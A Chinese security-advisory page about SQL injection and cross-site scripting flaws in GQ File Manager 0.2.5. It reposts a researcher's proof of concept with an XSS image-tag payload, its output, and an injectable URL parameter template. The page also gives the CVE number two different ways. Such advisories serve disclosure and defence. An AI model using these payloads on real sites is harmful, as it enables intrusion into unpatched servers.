当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

GQ File Manager index.php SQL注入漏洞

     发表日期:2015-01-19 14:04:08

GQ File Manager index.php SQL注入漏洞
CVE-ID:CVE-2014-9445
发布日期:2014-12-31
更新日期:2015-01-12
受影响系统:
installatron GQ File Manager 0.2.5
详细信息:

GQ File Manager是开源的web空间的文件管理应用程序。

 

Installatron GQ File Manager 0.2.5版本的incl/create.inc.php存在Sql注入漏洞,远程攻击者通过index.php的create参数,利用此漏洞可执行任意sql命令。


来源:
TaurusOmar
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!TaurusOmar ()提供了如下测试方法:

 

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

INDEPENDENT SECURITY RESEARCHER

PENETRATION TESTING SECURITY

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

 

 

# Exploit Title: GQ File Manager - Sql Injection - Cross Site Scripting Vulnerability\'s

# Date: 19/12/2014

# Url Vendor: http://installatron.com/phpfilemanager

# Vendor Name: GQ File Manager

# Version: 0.2.5

# CVE: CVE-2014-1137

# Author: TaurusOmar

# Tiwtter: @TaurusOmar_

# Email: taurusomar13@gmail.com

# Home: overhat.blogspot.com

# Tested On: Bugtraq Optimus

# Risk: High

 

Description

GQ File Manager is a lightweight file manager that enables files to be uploaded to and downloaded from a server directory. GQ File Manager is great for creating and maintaining a simple cloud-based repository of files that can be accessed from anywhere on the Internet.

 

------------------------

+ CROSS SITE SCRIPTING +

------------------------

# Exploiting Description - Created new file example:("xss.html")in the document insert code xss

 

Input:

"><img src=x onerror=;;alert(\'XSS\') />

Output:

<br />

<b>Warning</b>: fread() [<a href=\'function.fread\'>function.fread</a>]: Length parameter must be greater than 0 in <b>/home/u138790842/public_html/gp/incl/edit.inc.php</b> on line <b>44</b><br />

"><img src=x onerror=alert("xss");>

 

#P0c

"><img src=x onerror=;;alert(\'XSS\') />

 

#Proof Concept

http://i.imgur.com/cjIvR5l.jpg

 

 

------------------------

+ Sql Injection +

------------------------

# Exploiting Description - The Sql Injection in path created a new file.

 

#P0c

http://site.com/GQFileManager/index.php?&&output=create&create=[sql]

 

#Proof Concept

http://i.imgur.com/IJZoDVt.jpg
解决办法:
厂商补丁:

installatron
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

 

http://installatron.com/gatequestfilemanager?s=VLOAgK3AWmIAAC4tHn8AAAAB